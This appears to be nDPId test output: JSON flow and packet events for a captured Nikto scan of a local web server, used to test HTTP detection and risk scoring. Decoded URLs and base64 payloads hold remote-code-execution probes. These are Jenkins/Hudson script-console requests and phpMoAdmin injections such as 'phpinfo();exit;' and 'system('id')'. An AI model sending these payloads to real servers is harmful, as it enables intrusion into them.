+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
+01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
+01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
+01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
